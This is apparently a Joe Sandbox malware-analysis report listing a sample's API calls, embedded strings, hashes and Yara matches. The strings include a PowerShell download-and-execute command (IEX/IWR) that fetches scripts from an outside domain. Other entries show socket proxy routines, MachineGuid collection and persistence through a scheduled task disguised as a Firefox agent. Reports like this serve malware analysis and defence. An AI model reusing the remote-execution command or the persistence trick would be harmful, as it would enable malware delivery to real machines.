                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnvironmentExpandStrings$AttributesFile$ExecuteShelllstrcpywnsprintf
                    • String ID: %ComSpec%$%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe$%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe$/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"$https://www.wilkinsonbeane.com/css/slider$open$sd2.ps1$sd4.ps1
                    • API String ID: 4132772799-3770388065
                    • Opcode ID: f75d5354c7c1e9aed9d69c2ef26f7d1d90b92e022a20ddf8b0966a1c46870405
                    • Instruction ID: 61ca7a1ebf6fbb680aacd55c37e35184eaaabea127df12e978f57d37881dc7b6
                    • Opcode Fuzzy Hash: f75d5354c7c1e9aed9d69c2ef26f7d1d90b92e022a20ddf8b0966a1c46870405
                    • Instruction Fuzzy Hash: 9321CF7194021CABDB10DBA88C55FFAF7ACEB04714F0019D3EA98E21D0FBB45A848B91
                    APIs
                    • CreatePipe.KERNEL32(?,?,?,00000000), ref: 00BD5883
                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD58E1
                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD58F4
                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD58F9
                    • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD5910
                    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD5927
                    • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD5964
                    • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD598F
                    • HeapAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD5992
                    • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD599D
                    • HeapReAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD59A0
                    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD59F7
                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD5A13
                    • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD5A18
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandleHeap$PipeProcess$AllocCreateNamedPeek$FileObjectReadSingleWait
                    • String ID: D
                    • API String ID: 2337985897-2746444292
                    • Opcode ID: 70c0fc5ed73fe27c01dbfff7affbdebd7f6031266bb6c25af88a1a87be492e8a
                    • Instruction ID: 79caa03b8022066658b5337bfe227715ff3502c5a96150191f5d28e8b3135032
                    • Opcode Fuzzy Hash: 70c0fc5ed73fe27c01dbfff7affbdebd7f6031266bb6c25af88a1a87be492e8a
                    • Instruction Fuzzy Hash: BB517375A00219EFEB208FA5DC94FAFFBB9FF44714F1444A6E914E7290EB7498048B64
                    APIs
                    • inet_pton.WS2_32(00000002,?,?), ref: 00BD6430
                    • htons.WS2_32(?), ref: 00BD644C
                    • inet_pton.WS2_32(00000002,?,?), ref: 00BD645E
                    • htons.WS2_32(?), ref: 00BD6465
                    • socket.WS2_32(00000002,00000001,00000006), ref: 00BD6478
                    • connect.WS2_32(00000000,?,00000010), ref: 00BD6493
                    • socket.WS2_32(00000002,00000001,00000006), ref: 00BD64A6
                    • connect.WS2_32(00000000,?,00000010), ref: 00BD64BB
                    • closesocket.WS2_32(00000000), ref: 00BD64C3
                    • select.WS2_32(00000000,?), ref: 00BD64F8
                    • recv.WS2_32(?,?,00000400,00000000), ref: 00BD6534
                    • send.WS2_32(00000000,?,00000000,00000000), ref: 00BD655A
                    • select.WS2_32(00000000,00000002,00000000,00000000,00000000), ref: 00BD658C
                    • closesocket.WS2_32(00000000), ref: 00BD65A6
                    • closesocket.WS2_32(00000000), ref: 00BD65AD
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BD65B9
                    • HeapFree.KERNEL32(00000000), ref: 00BD65C0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: closesocket$Heapconnecthtonsinet_ptonselectsocket$FreeProcessrecvsend
                    • String ID:
                    • API String ID: 2202494921-0
                    • Opcode ID: 8fb5472fa3e5c5d6bc32117c70dd37ed672275c54cdba27c019fc80058fe10e4
                    • Instruction ID: c987a255a552733a36935fa2e2aeaf6242e2ccd6ecb1a69b9a45aaee6ba3bb43
                    • Opcode Fuzzy Hash: 8fb5472fa3e5c5d6bc32117c70dd37ed672275c54cdba27c019fc80058fe10e4
                    • Instruction Fuzzy Hash: C351AD71105304ABD2109F64DC89F6EF7E8FB88B24F110A1BF654E72E0EBB0D9458B66
                    APIs
                    • inet_pton.WS2_32(00000002,?,?), ref: 00BD7583
                    • htons.WS2_32(?), ref: 00BD758E
                    • socket.WS2_32(00000002,00000001,00000006), ref: 00BD75A6
                    • connect.WS2_32(00000000,?,00000010), ref: 00BD75C4
                    • recv.WS2_32(00000000,?,00000002,00000000), ref: 00BD75DC
                    • GetProcessHeap.KERNEL32(00000008,00000024), ref: 00BD75FD
                    • HeapAlloc.KERNEL32(00000000), ref: 00BD7600
                    • CreateThread.KERNEL32(00000000,00000000,Function_00006410,00000000,00000000,00000000), ref: 00BD767B
                    • CloseHandle.KERNEL32(00000000), ref: 00BD7686
                    • recv.WS2_32(00000000,?,00000002,00000000), ref: 00BD769E
                    • closesocket.WS2_32(00000000), ref: 00BD76AD
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BD76B6
                    • HeapFree.KERNEL32(00000000), ref: 00BD76B9
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD76D3
                    • HeapFree.KERNEL32(00000000), ref: 00BD76D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$Process$Freerecv$AllocCloseCreateHandleThreadclosesocketconnecthtonsinet_ptonsocket
                    • String ID:
                    • API String ID: 2784442062-0
                    • Opcode ID: cabab0230bde8d610161e5ec67a4c8470c5cb3c00e1658b6eb21ae08aad667fd
                    • Instruction ID: 4115808b0bde36d7d83cc38394a9b86b80608985497ec2f8ed445e80f3735122
                    • Opcode Fuzzy Hash: cabab0230bde8d610161e5ec67a4c8470c5cb3c00e1658b6eb21ae08aad667fd
                    • Instruction Fuzzy Hash: DD41B034A45745AAD7208F788C59FABBBA8EF05B11F14019BFA059B291FB70D84187A4
                    APIs
                    • EnterCriticalSection.KERNEL32(00BDA090), ref: 00BD6B31
                    • StrCmpNIA.SHLWAPI(?,?,00000000), ref: 00BD6B6A
                    • LeaveCriticalSection.KERNEL32(00BDA090,00000000), ref: 00BD6B86
                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6BE0
                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6BE7
                    • LeaveCriticalSection.KERNEL32(00BDA090,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6BFD
                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6C17
                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6C1E
                    • LeaveCriticalSection.KERNEL32(00BDA090,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6C2F
                    • GetProcessHeap.KERNEL32(00000008,?,?), ref: 00BD6C3B
                    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6C42
                    • LeaveCriticalSection.KERNEL32(00BDA090), ref: 00BD6C53
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$CriticalSection$Leave$Process$Alloc$EnterFree
                    • String ID:
                    • API String ID: 2132424838-0
                    • Opcode ID: d4c24263c4b606809c09dc994a63d9c30eb3a07ebb0a2d72add637dfba9eb9e0
                    • Instruction ID: 52127c343592038746a324a6fda131aff9cbf9a2e78d115bb9833d2ea88650bb
                    • Opcode Fuzzy Hash: d4c24263c4b606809c09dc994a63d9c30eb3a07ebb0a2d72add637dfba9eb9e0
                    • Instruction Fuzzy Hash: 0831BEB6602200DFD7245FA4EC68F6AFBA5FB94712F0940ABE141D72A0FF3084008711
                    APIs
                    • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 00BD71CA
                    • RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 00BD71E6
                    • GetProcessHeap.KERNEL32(00000008,?), ref: 00BD71F9
                    • HeapAlloc.KERNEL32(00000000), ref: 00BD7200
                    • RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 00BD721D
                    • RegCloseKey.ADVAPI32(80000002), ref: 00BD7229
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: HeapQueryValue$AllocCloseOpenProcess
                    • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                    • API String ID: 2639912721-1211650757
                    • Opcode ID: 2023657b28cc42f4e89e4a245326aa40c1e08026af260d9ed047562c044f2eed
                    • Instruction ID: f2cfbdd7c9bb3ee5434e54d7bfe9cbe433a1c98eca2fef17c75bf4aba0bb6944
                    • Opcode Fuzzy Hash: 2023657b28cc42f4e89e4a245326aa40c1e08026af260d9ed047562c044f2eed
                    • Instruction Fuzzy Hash: 83318D35E89259AADB318BA4CC85BEFFBF9FF56700F65449BE84193350FB7099408290
                    APIs
                    • type_info::operator==.LIBVCRUNTIME ref: 00D1630A
                    • ___TypeMatch.LIBVCRUNTIME ref: 00D16418
                    • CallUnexpected.LIBVCRUNTIME ref: 00D16585
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CallMatchTypeUnexpectedtype_info::operator==
                    • String ID: csm$csm$csm
                    • API String ID: 1206542248-393685449
                    • Opcode ID: 6459e2f8511dafef2ee68d36d5dd2e770484cc02a4ab8f4f9fb42eb2cba54af9
                    • Instruction ID: 44e685f591335fab9410e06b7b1b637a7133df140f7453c7ba42e292f83a71ec
                    • Opcode Fuzzy Hash: 6459e2f8511dafef2ee68d36d5dd2e770484cc02a4ab8f4f9fb42eb2cba54af9
                    • Instruction Fuzzy Hash: 20B15671800209FFCF29DFA4E9819EEBBB5FF44310B18415AE8116B216DB35DA91CBB1
                    APIs
                    • InternetCrackUrlW.WININET(00BDA114,00000000,00000000,0000003C), ref: 00BD66D5
                    • GetProcessHeap.KERNEL32(00000008,00000001,00BDA114), ref: 00BD66F7
                    • HeapAlloc.KERNEL32(00000000), ref: 00BD66FA
                    • GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 00BD6769
                    • HeapAlloc.KERNEL32(00000000), ref: 00BD676C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocProcess$CrackInternet
                    • String ID: <
                    • API String ID: 2637570027-4251816714
                    • Opcode ID: ea724c2abe7c97f11acf9e794f7ddc401e41a850c8baab9b451a01540290dedb
                    • Instruction ID: 841c5619da90b24c91b6e693f9baaf8d019a061061ba01cadcc36a03d652121e
                    • Opcode Fuzzy Hash: ea724c2abe7c97f11acf9e794f7ddc401e41a850c8baab9b451a01540290dedb
                    • Instruction Fuzzy Hash: 4851B038A0120A8FDB24CF68D480BAEFBF4EF49308F2440AED859D7751EB719D068B50
                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 00D15B97
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00D15B9F
                    • _ValidateLocalCookies.LIBCMT ref: 00D15C28
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00D15C53
                    • _ValidateLocalCookies.LIBCMT ref: 00D15CA8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: csm
                    • API String ID: 1170836740-1018135373
                    • Opcode ID: 607bfc32ae9713ac09a0047b8bed6966c2486a14e783b9312e45bac894d4dfa8
                    • Instruction ID: 006d3bf6403e62414f27038c48ac21cc08bf88d3878a9c2b1fbb5deb20529b79
                    • Opcode Fuzzy Hash: 607bfc32ae9713ac09a0047b8bed6966c2486a14e783b9312e45bac894d4dfa8
                    • Instruction Fuzzy Hash: 6941A334A00719EBCB10DF68E880ADEBBB2EF85314F148155E8149B355DB35E951CBB0
                    APIs
                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00D111AD,?,8DDD1821,?,00D1B629,?,00D195A8,00000000,00D111AD), ref: 00D1B5DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID: api-ms-$ext-ms-
                    • API String ID: 3664257935-537541572
                    • Opcode ID: 7e69fde9c650de908b6eee962b89bd38e7d47695c641ae096e01ab2960819afd
                    • Instruction ID: 6cd8330f408daa6665f214f561414232c904c76305a5c458f602e4d125bba0de
                    • Opcode Fuzzy Hash: 7e69fde9c650de908b6eee962b89bd38e7d47695c641ae096e01ab2960819afd
                    • Instruction Fuzzy Hash: 0021C332A00210BBEB319F24FD40AAE775A9BA1770B280111F901E7390DF34EE41C6F0
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 00BD81A6
                    • lstrcmpA.KERNEL32(00000000,INIT), ref: 00BD81B3
                    • StrToIntA.SHLWAPI(00000000), ref: 00BD8276
                    • GetTickCount64.KERNEL32 ref: 00BD867B
                      • Part of subcall function 00BD5760: GetProcessHeap.KERNEL32(00000008,00000001,00BD823E,00000001,00000000), ref: 00BD5763
                      • Part of subcall function 00BD5760: HeapAlloc.KERNEL32(00000000), ref: 00BD576A
                    • StrToIntA.SHLWAPI(00000000), ref: 00BD8574
                    • StrToIntA.SHLWAPI(?), ref: 00BD857D
                    • CreateThread.KERNEL32(00000000,00000000,Function_00007570,00000000,00000000,00000000), ref: 00BD8591
                    • CloseHandle.KERNEL32(00000000), ref: 00BD859C
                      • Part of subcall function 00BD5780: GetProcessHeap.KERNEL32(00000000,00000000,00BD86C5), ref: 00BD5787
                      • Part of subcall function 00BD5780: HeapFree.KERNEL32(00000000), ref: 00BD578E
                    • Sleep.KERNEL32(00000000), ref: 00BD86D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$ProcessSleep$AllocCloseCount64CreateFreeHandleThreadTicklstrcmp
                    • String ID:
                    • API String ID: 1253608127-0
                    • Opcode ID: c3b10d666269b400804ce1e8021778733171200425391d8e01901a90ffeebf2a
                    • Instruction ID: 466b51e023e8cfe5f9904ee39caff23d5868e36e7509423deb89667690518e71
                    • Opcode Fuzzy Hash: c3b10d666269b400804ce1e8021778733171200425391d8e01901a90ffeebf2a
                    • Instruction Fuzzy Hash: 92217C71A00615DBCB24ABB49CA1BAEF6E9AF44301F1041ABE912A7391FF34DD008B95
                    APIs
                    • GetLastError.KERNEL32(?,?,00D15EAB,00D15A9E,00D150C9), ref: 00D15EC2
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D15ED0
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D15EE9
                    • SetLastError.KERNEL32(00000000,00D15EAB,00D15A9E,00D150C9), ref: 00D15F3B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: d9dcd47aca24710877da4c0809feed74be06c4b20c01104a659bcc8e0c529ca5
                    • Instruction ID: 362c83059a13732b32684fbafe49b4de734d251f7e3be7b03f35b158a452255a
                    • Opcode Fuzzy Hash: d9dcd47aca24710877da4c0809feed74be06c4b20c01104a659bcc8e0c529ca5
                    • Instruction Fuzzy Hash: 3E01283250C715BEA6312674BDC6AE72B64EB66374730022AF020C11F5EF958C839170
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8DDD1821,?,?,00000000,00D22264,000000FF,?,00D18585,?,?,00D18559,00000016), ref: 00D185DE
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D185F0
                    • FreeLibrary.KERNEL32(00000000,?,00000000,00D22264,000000FF,?,00D18585,?,?,00D18559,00000016), ref: 00D18612
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 3148b657072cdf89e2764fc87be0bc9e76e004693cc7936742419a37ee73b9ad
                    • Instruction ID: 37b2f443fe82ea398d6e02a1ec8cfa9f06c23ef1f4932e4f9a12aa6ad2f5b8c0
                    • Opcode Fuzzy Hash: 3148b657072cdf89e2764fc87be0bc9e76e004693cc7936742419a37ee73b9ad
                    • Instruction Fuzzy Hash: D9014431A44769AFDB228F54DC05FAEB7B9FB14B15F040625E811E2290DB789905CAB4
                    APIs
                    • wnsprintfW.SHLWAPI ref: 00BD751F
                    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00BD753B
                      • Part of subcall function 00BD6C60: VariantInit.OLEAUT32(?), ref: 00BD6C77
                      • Part of subcall function 00BD6C60: CoCreateInstance.OLE32(00BD1020,00000000,00000001,00BD1000,?), ref: 00BD6C94
                      • Part of subcall function 00BD6C60: SysAllocString.OLEAUT32(\Mozilla), ref: 00BD6CD4
                      • Part of subcall function 00BD6C60: SysFreeString.OLEAUT32(?), ref: 00BD6D0B
                      • Part of subcall function 00BD6C60: SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 00BD6D18
                      • Part of subcall function 00BD6C60: SysFreeString.OLEAUT32(00000000), ref: 00BD6D2F
                      • Part of subcall function 00BD96E0: GetFileAttributesW.KERNEL32(?,00BD7551), ref: 00BD96E1
                    • DeleteFileW.KERNEL32(?), ref: 00BD755C
                    • ExitProcess.KERNEL32 ref: 00BD7564
                    Strings
                    • %%ProgramData%%\r%Sr.js, xrefs: 00BD7514
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: String$AllocFileFree$AttributesCreateDeleteEnvironmentExitExpandInitInstanceProcessStringsVariantwnsprintf
                    • String ID: %%ProgramData%%\r%Sr.js
                    • API String ID: 3376550436-2368859843
                    • Opcode ID: 11f1bbf37e6d0a49cd4e104e829ce2095946c8da8022aad7bdb492b20b4b79a1
                    • Instruction ID: 02fadf10bc65fcd69da0c44b3eee301865de4a32c226b3e1680626bf705ebf78
                    • Opcode Fuzzy Hash: 11f1bbf37e6d0a49cd4e104e829ce2095946c8da8022aad7bdb492b20b4b79a1
                    • Instruction Fuzzy Hash: 77F0FEB1550218A7CB10EBA0DC5AEDAB76CAB04708F4145E2B755A31A1FFB456C48B15
                    APIs
                    • __alloca_probe_16.LIBCMT ref: 00D1CCF5
                    • __alloca_probe_16.LIBCMT ref: 00D1CDBE
                    • __freea.LIBCMT ref: 00D1CE25
                      • Part of subcall function 00D19565: HeapAlloc.KERNEL32(00000000,00D111AD,?,?,00D111AD,?), ref: 00D19597
                    • __freea.LIBCMT ref: 00D1CE38
                    • __freea.LIBCMT ref: 00D1CE45
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __freea$__alloca_probe_16$AllocHeap
                    • String ID:
                    • API String ID: 1096550386-0
                    • Opcode ID: 127d7defbb7c6a79987eb90031ad5db6fa34a2294c3f18ea54b8a5b60b2818c4
                    • Instruction ID: 247b9ca641a1b7ed79484df84fc55baf9512aa90241023eb15a36ca7ca81068d
                    • Opcode Fuzzy Hash: 127d7defbb7c6a79987eb90031ad5db6fa34a2294c3f18ea54b8a5b60b2818c4
                    • Instruction Fuzzy Hash: D351B072650206BBEB219FA8EC45EFB7AAAEF84720F191429FD04D6151EF30DC90C670
                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D16F83,00000000,?,00D2BD4C,?,?,?,00D17126,00000004,InitializeCriticalSectionEx,00D23C98,InitializeCriticalSectionEx), ref: 00D16FDF
                    • GetLastError.KERNEL32(?,00D16F83,00000000,?,00D2BD4C,?,?,?,00D17126,00000004,InitializeCriticalSectionEx,00D23C98,InitializeCriticalSectionEx,00000000,?,00D16EDD), ref: 00D16FE9
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D17011
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
